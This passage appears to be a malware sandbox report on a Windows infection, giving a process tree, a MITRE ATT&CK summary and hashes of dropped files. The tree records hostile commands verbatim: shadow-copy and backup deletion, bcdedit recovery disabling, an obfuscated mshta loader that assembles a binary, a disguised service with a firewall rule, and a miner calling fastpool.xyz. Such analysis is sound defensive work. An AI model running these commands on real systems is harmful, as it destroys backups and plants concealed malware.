                                                                                                                                                                                                PID:4256
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\2DD3.exe
                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\2DD3.exe
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:5420
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\3556.exe
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\3556.exe
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:5808
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\377A.exe
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\377A.exe
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:2136
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\377A.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\377A.exe" -agent 0
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:5872
                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:1076
                                                                                                                                                                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                                                                                              vssadmin delete shadows /all /quiet
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                              • Interacts with shadow copies
                                                                                                                                                                                                              PID:5740
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:504
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:4356
                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:2432
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:5468
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                      wmic shadowcopy delete
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:4204
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                                                                                      notepad.exe
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:336
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:2168
                                                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                                                        C:\Windows\explorer.exe
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:5900
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:4808
                                                                                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                                                                                            C:\Windows\explorer.exe
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                              PID:3316
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:5752
                                                                                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:5916
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:2024
                                                                                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                                                                                    C:\Windows\explorer.exe
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:5668
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:5016
                                                                                                                                                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                          PID:4216
                                                                                                                                                                                                                                        • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                          C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                            PID:1836
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\C8D.exe
                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\C8D.exe
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                              PID:1376
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\C8D.exe
                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\C8D.exe
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                  PID:4372
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\C8D.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\C8D.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:3276
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\C8D.exe
                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\C8D.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                          PID:5568
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\3410bd55-f8a0-4bbb-8407-fe9daf44671a\build2.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\3410bd55-f8a0-4bbb-8407-fe9daf44671a\build2.exe"
                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                              PID:5800
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\3410bd55-f8a0-4bbb-8407-fe9daf44671a\build2.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\3410bd55-f8a0-4bbb-8407-fe9daf44671a\build2.exe"
                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                  PID:4480
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\3410bd55-f8a0-4bbb-8407-fe9daf44671a\build2.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                      PID:4028
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                        taskkill /im build2.exe /f
                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                                                                        PID:6096
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                        timeout /t 6
                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                        PID:508
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\FBB.exe
                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\FBB.exe
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                            PID:5332
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\igqhuniv\
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                PID:4160
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\phmmtlfj.exe" C:\Windows\SysWOW64\igqhuniv\
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                  PID:2364
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                  "C:\Windows\System32\sc.exe" create igqhuniv binPath= "C:\Windows\SysWOW64\igqhuniv\phmmtlfj.exe /d\"C:\Users\Admin\AppData\Local\Temp\FBB.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                    PID:1944
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                    "C:\Windows\System32\sc.exe" description igqhuniv "wifi internet conection"
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                      PID:2892
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                      "C:\Windows\System32\sc.exe" start igqhuniv
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                        PID:2996
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                        "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                          PID:4300
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\13B4.exe
                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\13B4.exe
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                          PID:5548
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im 13B4.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\13B4.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                              PID:2108
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                taskkill /im 13B4.exe /f
                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                                                                PID:1524
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                timeout /t 6
                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                PID:4764
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\21ED.exe
                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\21ED.exe
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                              PID:212
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                "C:\Windows\System32\mshta.exe" vBScRIpT: ClOSe ( creAteOBJect ( "WScrIpt.sHeLL" ). RUN ( "C:\Windows\system32\cmd.exe /Q /c cOpY /y ""C:\Users\Admin\AppData\Local\Temp\21ED.exe"" SSD3pQMwaP.exe && STaRT sSD3PQMWaP.exe -PmLQymN~qiAE1Rr & if """" == """" for %y In (""C:\Users\Admin\AppData\Local\Temp\21ED.exe"" ) do taskkill -Im ""%~nxy"" /f " , 0 , tRUE ) )
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                  PID:5152
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /Q /c cOpY /y "C:\Users\Admin\AppData\Local\Temp\21ED.exe" SSD3pQMwaP.exe &&STaRT sSD3PQMWaP.exe -PmLQymN~qiAE1Rr& if "" == "" for %y In ("C:\Users\Admin\AppData\Local\Temp\21ED.exe" ) do taskkill -Im "%~nxy" /f
                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                      PID:5860
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\SSD3pQMwaP.exe
                                                                                                                                                                                                                                                                                        sSD3PQMWaP.exe -PmLQymN~qiAE1Rr
                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                          PID:4028
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                            "C:\Windows\System32\mshta.exe" vBScRIpT: ClOSe ( creAteOBJect ( "WScrIpt.sHeLL" ). RUN ( "C:\Windows\system32\cmd.exe /Q /c cOpY /y ""C:\Users\Admin\AppData\Local\Temp\SSD3pQMwaP.exe"" SSD3pQMwaP.exe && STaRT sSD3PQMWaP.exe -PmLQymN~qiAE1Rr & if ""-PmLQymN~qiAE1Rr"" == """" for %y In (""C:\Users\Admin\AppData\Local\Temp\SSD3pQMwaP.exe"" ) do taskkill -Im ""%~nxy"" /f " , 0 , tRUE ) )
                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                            PID:4472
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /Q /c cOpY /y "C:\Users\Admin\AppData\Local\Temp\SSD3pQMwaP.exe" SSD3pQMwaP.exe &&STaRT sSD3PQMWaP.exe -PmLQymN~qiAE1Rr& if "-PmLQymN~qiAE1Rr" == "" for %y In ("C:\Users\Admin\AppData\Local\Temp\SSD3pQMwaP.exe" ) do taskkill -Im "%~nxy" /f
                                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                                PID:2260
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                              "C:\Windows\System32\mshta.exe" VBsCRiPt: cLOse ( CrEAteObjECt ( "WscRipt.sHElL" ). rUN ( "CmD /q /c EcHO vmbeC:\Users\Admin\AppData\Roaming_Wxf> C0iS.XE & echo | Set /P = ""MZ"" > 66WBQ~Nm.TVY & CoPY /y /B 66WBQ~Nm.TvY + Amo1ATs.M5 + eBH3o.q9X+ afLCPDH.SV +tMs2M.8AZ + PDPCi.BNj + C0IS.xe nKBJL.CW6 & StArT regsvr32.exe /U .\NKBJL.cW6 /S ", 0 , trUe ) )
                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                PID:4528
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /q /c EcHO vmbeC:\Users\Admin\AppData\Roaming_Wxf> C0iS.XE & echo | Set /P = "MZ" > 66WBQ~Nm.TVY &CoPY /y /B 66WBQ~Nm.TvY+Amo1ATs.M5 + eBH3o.q9X+ afLCPDH.SV +tMs2M.8AZ + PDPCi.BNj + C0IS.xe nKBJL.CW6 & StArT regsvr32.exe /U .\NKBJL.cW6 /S
                                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                                    PID:4480
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo "
                                                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                                                        PID:2496
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>66WBQ~Nm.TVY"
                                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                                          PID:1200
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                                                                                                          regsvr32.exe /U .\NKBJL.cW6 /S
                                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                                            PID:2892
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                      taskkill -Im "21ED.exe" /f
                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                                                                                                                      PID:5620
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\igqhuniv\phmmtlfj.exe
                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\igqhuniv\phmmtlfj.exe /d"C:\Users\Admin\AppData\Local\Temp\FBB.exe"
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                  PID:5000
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                    svchost.exe
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                      PID:5996
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                        svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                          PID:5252

                                                                                                                                                                                                                                                                                                    Network

                                                                                                                                                                                                                                                                                                    MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                    Execution

                                                                                                                                                                                                                                                                                                    Scheduled Task

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1053

                                                                                                                                                                                                                                                                                                    Persistence

                                                                                                                                                                                                                                                                                                    Modify Existing Service

                                                                                                                                                                                                                                                                                                    2
                                                                                                                                                                                                                                                                                                    T1031

                                                                                                                                                                                                                                                                                                    New Service

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1050

                                                                                                                                                                                                                                                                                                    Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1060

                                                                                                                                                                                                                                                                                                    Scheduled Task

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1053

                                                                                                                                                                                                                                                                                                    Hidden Files and Directories

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1158

                                                                                                                                                                                                                                                                                                    Privilege Escalation

                                                                                                                                                                                                                                                                                                    New Service

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1050

                                                                                                                                                                                                                                                                                                    Scheduled Task

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1053

                                                                                                                                                                                                                                                                                                    Defense Evasion

                                                                                                                                                                                                                                                                                                    Modify Registry

                                                                                                                                                                                                                                                                                                    3
                                                                                                                                                                                                                                                                                                    T1112

                                                                                                                                                                                                                                                                                                    Disabling Security Tools

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1089

                                                                                                                                                                                                                                                                                                    File Deletion

                                                                                                                                                                                                                                                                                                    2
                                                                                                                                                                                                                                                                                                    T1107

                                                                                                                                                                                                                                                                                                    Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1497

                                                                                                                                                                                                                                                                                                    File Permissions Modification

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1222

                                                                                                                                                                                                                                                                                                    Install Root Certificate

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1130

                                                                                                                                                                                                                                                                                                    Hidden Files and Directories

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1158

                                                                                                                                                                                                                                                                                                    Credential Access

                                                                                                                                                                                                                                                                                                    Credentials in Files

                                                                                                                                                                                                                                                                                                    3
                                                                                                                                                                                                                                                                                                    T1081

                                                                                                                                                                                                                                                                                                    Discovery

                                                                                                                                                                                                                                                                                                    Query Registry

                                                                                                                                                                                                                                                                                                    6
                                                                                                                                                                                                                                                                                                    T1012

                                                                                                                                                                                                                                                                                                    Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1497

                                                                                                                                                                                                                                                                                                    System Information Discovery

                                                                                                                                                                                                                                                                                                    6
                                                                                                                                                                                                                                                                                                    T1082

                                                                                                                                                                                                                                                                                                    Peripheral Device Discovery

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1120

                                                                                                                                                                                                                                                                                                    Collection

                                                                                                                                                                                                                                                                                                    Data from Local System

                                                                                                                                                                                                                                                                                                    3
                                                                                                                                                                                                                                                                                                    T1005

                                                                                                                                                                                                                                                                                                    Command and Control

                                                                                                                                                                                                                                                                                                    Web Service

                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                    T1102

                                                                                                                                                                                                                                                                                                    Impact

                                                                                                                                                                                                                                                                                                    Inhibit System Recovery

                                                                                                                                                                                                                                                                                                    2
                                                                                                                                                                                                                                                                                                    T1490

                                                                                                                                                                                                                                                                                                    Replay Monitor

                                                                                                                                                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                    Downloads

                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS0B7D7EF4\libcurl.dll
                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS0B7D7EF4\libcurlpp.dll
                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS0B7D7EF4\libgcc_s_dw2-1.dll
                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS0B7D7EF4\libstdc++-6.dll
                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      5e279950775baae5fea04d2cc4526bcc

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS0B7D7EF4\libwinpthread-1.dll
                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS0B7D7EF4\setup_install.exe
                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS0B7D7EF4\setup_install.exe
                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS0B7D7EF4\sonia_1.exe
                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS0B7D7EF4\sonia_1.exe
                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                      6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                      5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                      a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                      33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

